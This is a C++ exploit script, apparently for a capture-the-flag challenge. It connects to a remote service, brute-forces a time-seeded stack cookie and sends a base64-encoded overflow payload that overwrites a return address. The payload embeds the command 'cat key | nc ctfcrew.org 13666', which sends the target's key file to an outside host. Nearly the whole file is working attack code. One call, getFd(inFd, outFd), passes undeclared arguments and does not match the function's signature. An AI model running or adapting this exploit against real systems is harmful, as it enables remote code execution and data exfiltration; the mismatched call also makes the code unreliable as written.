#include <cstdlib>
#include <iostream>
#include <sstream>

#include <b64/encode.h>

#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#include <ext/stdio_filebuf.h>

using namespace std;

int getFd() {
	int sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

	sockaddr_in serv_addr = {};
	serv_addr.sin_family = AF_INET;
	serv_addr.sin_port = htons(4545);
	inet_pton(AF_INET, "54.218.22.41", &serv_addr.sin_addr);

	connect(sock, (sockaddr*)&serv_addr, sizeof(serv_addr));

	return sock;
}

int func(int time) {
	int fd = getFd(inFd, outFd);

	__gnu_cxx::stdio_filebuf<char> inBuf(fd, ios::in);
	istream is(&inBuf);

	__gnu_cxx::stdio_filebuf<char> outBuf(fd, ios::out);
	ostream os(&outBuf);

	char payload[] = {
		0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x12, 0x34, 0x56, 0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x10, 0x40, 0x00 //4024c0 604b80 4010d0
	};
	srand(time);
	int cookie = rand();
	payload[128] = (cookie >> 24) & 0xFF;
	payload[129] = (cookie >> 16) & 0xFF;
	payload[130] = (cookie >> 8) & 0xFF;
	payload[131] = cookie & 0xFF;
	const char shellcode[] = "cat key | nc ctfcrew.org 13666";
	copy(shellcode, shellcode + sizeof(shellcode), payload + 1);

	stringstream ss(ios::in | ios::out | ios::binary);
	ss.write(payload, sizeof(payload));
	stringstream ssOut;
	base64::encoder encoder;
	encoder.encode(ss, ssOut);

	string payloadString;
	while (false == ssOut.eof()) {
		string buf;
		getline(ssOut, buf);
		payloadString += buf;
	}

	os << payloadString << endl;
	os << payloadString << endl;

	string result;
	for (int i = 0; i != 5; ++i) {
		string buf;
		getline(is, buf);
		result += buf + "\n";
	}
	if (string::npos == result.find("HEAP")) {
		cout << result << endl;
		cout << payloadString << endl;
		return 0;
	}

	return 1;
}

int main() {
	int t = time(NULL) - 60;
	for (int i = 0; i != 3600; ++i) {
		cout << i << endl;
		int r = func(t + i);
		if (0 == r) {
			return 0;
		}
	}

	cout << "fail" << endl;
	return 0;
}